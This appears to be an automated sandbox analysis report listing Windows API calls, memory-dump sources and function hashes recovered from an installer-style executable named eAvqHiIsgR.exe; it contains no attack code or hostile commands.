                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                • String ID:
                                                                • API String ID: 2972824698-0
                                                                • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                                • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                                APIs
                                                                • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                                • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                                APIs
                                                                • GlobalAlloc.KERNELBASE(00000040,701A1233,?,701A12CF,-701A404B,701A11AB,-000000A0), ref: 701A121D
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: AllocGlobal
                                                                • String ID:
                                                                • API String ID: 3761449716-0
                                                                • Opcode ID: 6c72e62e5e3041f3a1b23ffa019ea3c0103ebfa581404e886f4e3d68846c4d31
                                                                • Instruction ID: f75b885bad8f3c73f5fe61a5f2ca1b8d52959fd76600c69f51aec8cd0357c457
                                                                • Opcode Fuzzy Hash: 6c72e62e5e3041f3a1b23ffa019ea3c0103ebfa581404e886f4e3d68846c4d31
                                                                • Instruction Fuzzy Hash: CEA002F3944100DBDE419BF28F0AF543B21E788701F22C050F315549B4CAB54010EB76
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                                • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                                • GetClientRect.USER32(?,?), ref: 00405407
                                                                • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                  • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                • ShowWindow.USER32(00000000), ref: 00405554
                                                                • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                • ShowWindow.USER32(00000008), ref: 004055A1
                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                • CreatePopupMenu.USER32 ref: 004055E6
                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                                • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                • OpenClipboard.USER32(00000000), ref: 00405680
                                                                • EmptyClipboard.USER32 ref: 00405686
                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                                • CloseClipboard.USER32 ref: 004056D7
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                • String ID:
                                                                • API String ID: 590372296-0
                                                                • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                                • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                                • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                  • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                  • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                  • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                  • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\eAvqHiIsgR.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                  • Part of subcall function 004063D2: CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                  • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                  • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                  • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: A$C:\Users\user\tranchet$Call
                                                                • API String ID: 2624150263-675926112
                                                                • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                APIs
                                                                  • Part of subcall function 701A1215: GlobalAlloc.KERNELBASE(00000040,701A1233,?,701A12CF,-701A404B,701A11AB,-000000A0), ref: 701A121D
                                                                • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 701A1BC4
                                                                • lstrcpyA.KERNEL32(00000008,?), ref: 701A1C0C
                                                                • lstrcpyA.KERNEL32(00000408,?), ref: 701A1C16
                                                                • GlobalFree.KERNEL32(00000000), ref: 701A1C29
                                                                • GlobalFree.KERNEL32(?), ref: 701A1D09
                                                                • GlobalFree.KERNEL32(?), ref: 701A1D0E
                                                                • GlobalFree.KERNEL32(?), ref: 701A1D13
                                                                • GlobalFree.KERNEL32(00000000), ref: 701A1EFA
                                                                • lstrcpyA.KERNEL32(?,?), ref: 701A2098
                                                                • GetModuleHandleA.KERNEL32(00000008), ref: 701A2114
                                                                • LoadLibraryA.KERNEL32(00000008), ref: 701A2125
                                                                • GetProcAddress.KERNEL32(?,?), ref: 701A217E
                                                                • lstrlenA.KERNEL32(00000408), ref: 701A2198
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                • String ID:
                                                                • API String ID: 245916457-0
                                                                • Opcode ID: 1915950d304a87123c2f264d9c3a92f9f3fba062d0b0d66b84990a455eac6438
                                                                • Instruction ID: 1dc7cfc0c7f549298e90333f940f23b9edd847f931f094fd8a39f1165fa3e576
                                                                • Opcode Fuzzy Hash: 1915950d304a87123c2f264d9c3a92f9f3fba062d0b0d66b84990a455eac6438
                                                                • Instruction Fuzzy Hash: DD22BDF9D0424ADFCB128FA8C9807ADBBF9FB05314F22456EE196E3684DB745981CB50
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                                • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                                • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                  • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                                • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                                • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                                • ShowWindow.USER32(00000000), ref: 0040517B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $M$N
                                                                • API String ID: 2564846305-813528018
                                                                • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                • ShowWindow.USER32(?), ref: 00403D00
                                                                • DestroyWindow.USER32 ref: 00403D14
                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                                • GetDlgItem.USER32(?,?), ref: 00403D51
                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                                • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                                • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                                • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                • EnableWindow.USER32(?,?), ref: 00403F68
                                                                • EnableWindow.USER32(?,?), ref: 00403F83
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                • String ID:
                                                                • API String ID: 184305955-0
                                                                • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                APIs
                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                                • GetSysColor.USER32(?), ref: 004043B4
                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                                • SendMessageA.USER32(00000000), ref: 0040445E
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                                • SetCursor.USER32(00000000), ref: 004044E1
                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                                • SetCursor.USER32(00000000), ref: 004044FA
                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                • String ID: Call$N
                                                                • API String ID: 3103080414-3438112850
